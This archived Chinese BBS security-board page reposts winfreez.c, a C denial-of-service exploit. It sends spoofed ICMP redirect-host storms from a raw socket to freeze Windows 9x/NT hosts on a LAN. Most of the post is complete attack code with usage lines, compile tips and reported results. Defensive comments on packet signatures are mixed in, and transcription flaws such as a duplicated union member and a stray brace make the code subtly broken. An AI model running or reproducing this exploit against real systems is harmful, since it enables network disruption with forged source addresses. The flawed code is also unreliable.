<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center">               ● UNIX网络编程                       (BM: clown)                </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p   align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="184.htm">上一层</a>][<a href="332.htm">下一篇</a>]
<hr><p align="left"><small>发信人: cloudsky (小四), 信区: Security <br>

标  题: winfreeze.c <br>

发信站: 武汉白云黄鹤站 (Mon Apr 10 11:59:40 2000), 站内信件 <br>

/* <br>

 WinFreez.c by Delmore <delmore@moscowmail.com> <br>

 ICMP/Redirect-host message storm freeze Win9x/NT(sp4) box <br>

 in LAN. <br>

 Usage: winfreez sendtoip sendfromip time <br>

 where <sendtoip> is victim host, <sendfromip> is router <br>

 for victim host, <time> is time in seconds to freeze victim. <br>

 Note: <br>

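 I've written a small exploit that freezes Win9x/NT boxes on a LAN. <br>

 The program sends a storm of ICMP Redirect-host messages that appear <br>

 to come from the router (the router's IP is used as the source). <br>

 Windows accepts each redirect-host message and changes its own route <br>

 table, so the host freezes or runs slowly for the duration of the storm. <br>

 The effect depends on the victim accepting ICMP redirects: a host that <br>

 ignores them should not see these route-table changes, and a burst of <br>

 ICMP type 5 (redirect) messages on a segment is the thing to watch for. <br>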

 On the victim machine, the route table changes can be viewed with the <br>

 ROUTE PRINT <br>

 command in an MS-DOS box. <br>

 The exploit shows different results on different system configurations. <br>

 System results: <br>

 p200/16ram/win95osr2 executes applications slowly <br>

 after 20 seconds of storm. <br>



 p233/96ram/nt4-sp4 works slowly after 30 <br>

 seconds of storm. <br>

 p2-266/64ram/win95 works slowly and can't execute applications <br>

 normally. <br>

 Compiled on RedHat Linux 5, Kernel 2.0.35 (x86) <br>

 gcc ./winfreez.c -o winfreez <br>

 --- for Slackware Linux, Kernel 2.0.30 <br>

 If you can't compile due to ip_sum not defined errors, <br>

 replace (line 207): <br>

  ip->ip_sum = 0; <br>

 to line: <br>

  ip->ip_csum = 0; <br>

 --- <br>

 Soldiers Of Satan group <br>

 Russia, Moscow State University, 05 march 1999 <br>

 http://sos.nanko.ru <br>

 Thanx to Mark Henderson. <br>

 */ <br>

#include <stdio.h> <br>

#include <stdlib.h> <br>

#include <time.h> <br>

#include <string.h> <br>



#include <sys/types.h> <br>

#include <sys/socket.h> <br>

#include <netdb.h> <br>

#include <netinet/in.h> <br>

#include <netinet/in_systm.h> <br>

#include <netinet/ip.h> <br>

#include <netinet/ip_icmp.h> <br>

/* <br>

 * Structure of an icmp header (from sparc header). <br>

 * <br>

 * Local copy of an ICMP message layout: type, code and checksum, then <br>

 * a union (icmp_hun) for the per-type header word and a union <br>

 * (icmp_dun) for the per-type payload. The icmp_* macros defined inside <br>

 * the struct are shorthand for the union members. <br>

 * <br>

 * The code on this page only touches icmp_type, icmp_code, icmp_cksum, <br>

 * icmp_gwaddr (the gateway address carried by a redirect) and icmp_ip <br>

 * (the IP header embedded in the message body). <br>

 */ <br>

struct icmp { <br>

 u_char icmp_type; /* type of message, see below */ <br>

 u_char icmp_code; /* type sub code */ <br>

 u_short icmp_cksum; /* ones complement cksum of struct */ <br>

union { <br>

 u_char ih_pptr; /* ICMP_PARAMPROB */ <br>

 struct in_addr ih_gwaddr; /* ICMP_REDIRECT */ <br>

 struct ih_idseq { <br>

 n_short icd_id; <br>

 n_short icd_seq; <br>

} ih_idseq; <br>

int ih_void; <br>

int ih_void; <br>

} icmp_hun; /* per-type header word that follows the checksum */ <br>

#define icmp_pptr icmp_hun.ih_pptr <br>

#define icmp_gwaddr icmp_hun.ih_gwaddr <br>

#define icmp_id icmp_hun.ih_idseq.icd_id <br>

#define icmp_seq icmp_hun.ih_idseq.icd_seq <br>

#define icmp_void icmp_hun.ih_void <br>

union { <br>

 struct id_ts { <br>

 n_time its_otime; <br>

 n_time its_rtime; <br>

 n_time its_ttime; <br>

} id_ts; <br>

struct id_ip  { <br>

struct ip idi_ip; <br>

/* options and then 64 bits of data */ <br>

} id_ip; <br>

u_long id_mask; <br>

char id_data[1]; <br>

} icmp_dun; /* per-type payload; id_ip is the embedded IP header */ <br>

#define icmp_otime icmp_dun.id_ts.its_otime <br>

#define icmp_rtime icmp_dun.id_ts.its_rtime <br>

#define icmp_ttime icmp_dun.id_ts.its_ttime <br>



#define icmp_ip icmp_dun.id_ip.idi_ip <br>

#define icmp_mask icmp_dun.id_mask <br>

#define icmp_data icmp_dun.id_data <br>

}; <br>

u_short in_cksum (u_short *addr, int len); <br>

void attack( char *sendtoip, char *sendfromip, time_t wtime, int s ); <br>

/* <br>

 * main -- command-line driver. <br>

 * <br>

 * Expects exactly three arguments (sendto, sendfrom, time), copies the <br>

 * two address strings, converts the time with atol(), opens a raw IP <br>

 * socket, prints a banner with the parameters and hands everything to <br>

 * attack(). A wrong argument count or a socket/setsockopt failure <br>

 * prints a message to stderr and exits with status 1. <br>

 * <br>

 * Defender's note: the raw socket together with IP_HDRINCL is what lets <br>

 * the program supply its own IP header, including the source address, <br>

 * so the source IP seen on the wire says nothing about the real sender. <br>

 * Creating a raw socket normally requires elevated privileges. <br>

 */
void main (int argc, char **argv) <br>

{ <br>

  time_t wtime; <br>

  char *sendtoip, *sendfromip; <br>

  int s, on; <br>

  if (argc != 4) <br>

    { <br>

      fprintf (stderr, "usage: %s sendto sendfrom time\n", argv[0]); <br>

      exit (1); <br>

    } <br>

  sendtoip = (char *)malloc(strlen(argv[1]) + 1); /* private copy of argv[1] */ <br>

  strcpy(sendtoip, argv[1]); <br>

  sendfromip = (char *)malloc(strlen(argv[2]) + 1); /* private copy of argv[2] */ <br>

  strcpy(sendfromip, argv[2]); <br>

  wtime = atol(argv[3]); /* no validation: non-numeric input becomes 0, and attack() returns at once for 0 */ <br>

  if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) /* raw IP socket */ <br>



    { <br>

      fprintf (stderr, "socket creation error\n" ); <br>

      exit (1); <br>

    } <br>

#ifdef IP_HDRINCL <br>

  if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, &on, sizeof (on)) < 0) /* IP header will come from the caller's buffer */ <br>

    { <br>

      fprintf (stderr, "sockopt IP_HDRINCL error\n" ); <br>

      exit (1); <br>

    } <br>

#endif <br>

  printf("winfreez by Delmore, <delmore@moscowmail.com>\n"); <br>

  printf("Soldiers Of Satan group, http://sos.nanko.ru\n\n"); <br>

  printf("sendto = %s\n", sendtoip); <br>

  printf("sendfrom = %s\n", sendfromip); <br>

  printf("time = %i s\n", wtime); /* NOTE(review): %i expects int; wtime is time_t */ <br>

  attack( sendtoip, sendfromip, wtime, s ); <br>

  free( (void *) sendtoip ); <br>

  free( (void *) sendfromip ); <br>

} <br>

/* <br>

 * attack -- send ICMP redirect-host messages to sendtoip, looping until <br>

 * time(NULL) equals the end time computed at entry (now + wtime). <br>

 * <br>

 * sendtoip    destination of every packet (host name or dotted quad) <br>

 * sendfromip  address written into the IP source field <br>

 * wtime       duration in seconds; 0 returns immediately <br>

 * s           raw socket opened by the caller <br>

 * <br>

 * Exits the process with status 1 if either address cannot be resolved <br>

 * or if sendto() fails. <br>

 * <br>

 * What each packet looks like as built below (useful when writing a <br>

 * capture filter or an IDS rule for this traffic): <br>

 *   - total length 100 bytes (sizeof buf), protocol 1 (ICMP) <br>

 *   - outer IP header: id 4321, TTL 255, source = sendfromip <br>

 *   - ICMP type ICMP_REDIRECT, code 1 (redirect host) <br>

 *   - gateway address field set to the destination host's own address <br>

 *   - embedded IP header: id 3722, TTL 254, source = destination host, <br>

 *     destination = a random dotted quad regenerated for every packet <br>

 * A host that does not accept ICMP redirects does not make the <br>

 * route-table changes this traffic relies on. <br>

 */
void attack( char *sendtoip, char *sendfromip, time_t wtime, int s ) <br>

{ <br>

{ <br>

  time_t curtime, endtime; <br>

  int i1, i2, i3, i4; <br>

  char redir[21]; /* text form of the random embedded destination */ <br>

  char buf[100]; /* the whole packet: IP header followed by the ICMP message */ <br>

  struct ip *ip = (struct ip *) buf; <br>

  struct icmp *icmp = (struct icmp *) (ip + 1); /* ICMP message starts right after the IP header */ <br>

  struct hostent *hp; <br>

  struct sockaddr_in dst; <br>

  if(wtime==0) return; <br>

  if ((hp = gethostbyname (sendtoip)) == NULL) <br>

   if ((ip->ip_dst.s_addr = inet_addr (sendtoip)) == -1) <br>

     { <br>

      fprintf (stderr, "%s: unknown sendto\n", sendtoip); <br>

      exit (1); <br>

     } <br>

  if ((hp = gethostbyname (sendfromip)) == NULL) <br>

   if ((ip->ip_src.s_addr = inet_addr (sendfromip)) == -1) <br>

     { <br>

      fprintf (stderr, "%s: unknown sendfrom\n", sendfromip); <br>

      exit (1); <br>

     } <br>

  endtime = time(NULL) + wtime; <br>



  srand((unsigned int) endtime); /* PRNG seeded from the end time */ <br>

 do { <br>

  bzero (buf, sizeof buf); /* packet is rebuilt from scratch on every iteration */ <br>

  /* sendto/gateway */ <br>

  hp = gethostbyname (sendtoip); <br>

  bcopy (hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length); <br>

  bcopy (hp->h_addr_list[0], &icmp->icmp_gwaddr.s_addr, hp->h_length); /* gateway field = the destination's own address */ <br>

  /* sendfrom */ <br>

  hp = gethostbyname (sendfromip); <br>

  bcopy (hp->h_addr_list[0], &ip->ip_src.s_addr, hp->h_length); <br>

  /* generate redirect*/ <br>

  i1 = 1+(int) (223.0*rand()/(RAND_MAX+1.0)); /* 1..223 */ <br>

  i2 = 1+(int) (253.0*rand()/(RAND_MAX+1.0)); /* 1..253 */ <br>

  i3 = 1+(int) (253.0*rand()/(RAND_MAX+1.0)); /* 1..253 */ <br>

  i4 = 1+(int) (253.0*rand()/(RAND_MAX+1.0)); /* 1..253 */ <br>

  bzero (redir, sizeof redir); <br>

  sprintf(redir,"%u.%u.%u.%u", i4, i3, i2, i1 ); /* octets are printed in the order i4.i3.i2.i1 */ <br>

  hp = gethostbyname (redir); <br>

  bcopy (hp->h_addr_list[0], &icmp->icmp_ip.ip_dst.s_addr, hp->h_length); /* embedded header's destination = the random address */ <br>

  ip->ip_v = 4; <br>

  ip->ip_hl = sizeof *ip >> 2; /* header length in 32-bit words */ <br>

  ip->ip_tos = 0; <br>



  ip->ip_len = htons (sizeof buf); <br>

  ip->ip_id = htons (4321); /* constant on every packet */ <br>

  ip->ip_off = 0; <br>

  ip->ip_ttl = 255; <br>

  ip->ip_p = 1; /* protocol 1 = ICMP */ <br>

  ip->ip_sum = 0;               /* kernel fills this in */ <br>

  bcopy (&ip->ip_dst.s_addr, &icmp->icmp_ip.ip_src.s_addr, sizeof(ip->ip_dst <br>

.s_a <br>

ddr)); <br>

  icmp->icmp_ip.ip_v = 4; <br>

  icmp->icmp_ip.ip_hl = sizeof *ip >> 2; <br>

  icmp->icmp_ip.ip_tos = 0; <br>

  icmp->icmp_ip.ip_len = htons (100);   /* doesn't matter much */ <br>

  icmp->icmp_ip.ip_id = htons (3722); /* constant on every packet */ <br>

  icmp->icmp_ip.ip_off = 0; <br>

  icmp->icmp_ip.ip_ttl = 254; <br>

  icmp->icmp_ip.ip_p = 1; <br>

  icmp->icmp_ip.ip_sum = in_cksum ((u_short *) & icmp->icmp_ip, sizeof *ip); /* checksum of the embedded header only */ <br>

  <br>

  dst.sin_addr = ip->ip_dst; <br>

  dst.sin_family = AF_INET; <br>

  icmp->icmp_type = ICMP_REDIRECT; <br>



  icmp->icmp_code = 1; /* 1 - redirect host, 0 - redirect net */ <br>

  icmp->icmp_cksum = in_cksum ((u_short *) icmp, sizeof (buf) - sizeof(*ip)) <br>

; <br>

  if( sendto( s, buf, sizeof buf, 0, (struct sockaddr *) &dst, sizeof dst) < <br>

 0 ) <br>

    { <br>

      fprintf (stderr, "sendto error\n"); <br>

      exit (1); <br>

    } <br>

  }while (time(NULL)!=endtime); /* no delay between packets; stops when the clock equals endtime */ <br>

} <br>

/* <br>

 * in_cksum -- Checksum routine for Internet Protocol family headers (C <br>

 * Version) - code from 4.4 BSD <br>

 * <br>

 * addr  start of the data, read as a sequence of 16-bit words <br>

 * len   length of the data in bytes; an odd length is allowed <br>

 * <br>

 * Returns the one's complement of the folded sum, truncated to 16 bits. <br>

 */ <br>

u_short in_cksum (u_short *addr, int len) <br>

{ <br>

  register int nleft = len; /* bytes still to be summed */ <br>

  register u_short *w = addr; /* next 16-bit word to read */ <br>

  register int sum = 0; <br>

  u_short answer = 0; /* zeroed so the odd-byte case leaves the other byte 0 */ <br>

  /* <br>

   * Our algorithm is simple, using a 32 bit accumulator (sum), we add <br>

   * sequential 16 bit words to it, and at the end, fold back all the <br>

   * carry bits from the top 16 bits into the lower 16 bits. <br>

   */ <br>

  while (nleft > 1) <br>

    { <br>

      sum += *w++; <br>

      nleft -= 2; <br>

    } <br>

  /* mop up an odd byte, if necessary */ <br>

  if (nleft == 1) <br>

    { <br>

      *(u_char *) (&answer) = *(u_char *) w; /* trailing byte goes into the first byte of answer */ <br>

      sum += answer; <br>

    } <br>

  /* add back carry outs from top 16 bits to low 16 bits */ <br>

  sum = (sum >> 16) + (sum & 0xffff);   /* add hi 16 to low 16 */ <br>

  sum += (sum >> 16);           /* add carry */ <br>

  answer = ~sum;                /* truncate to 16 bits */ <br>

  return (answer); <br>

} <br>

-- <br>



            我问飘逝的风:来迟了? <br>

            风感慨:是的,他们已经宣战。 <br>

            我问苏醒的大地:还有希望么? <br>

            大地揉了揉眼睛:还有,还有无数代的少年。 <br>

            我问长空中的英魂:你们相信? <br>

            英魂带着笑意离去:相信,希望还在。 <br>

</small><hr>
<p align="center">[<a href="index.htm">回到开始</a>][<a href="184.htm">上一层</a>][<a href="332.htm">下一篇</a>]
<p align="center"><a href="http://cterm.163.net">欢迎访问Cterm主页</a></p>
</table>
</body>
</html>
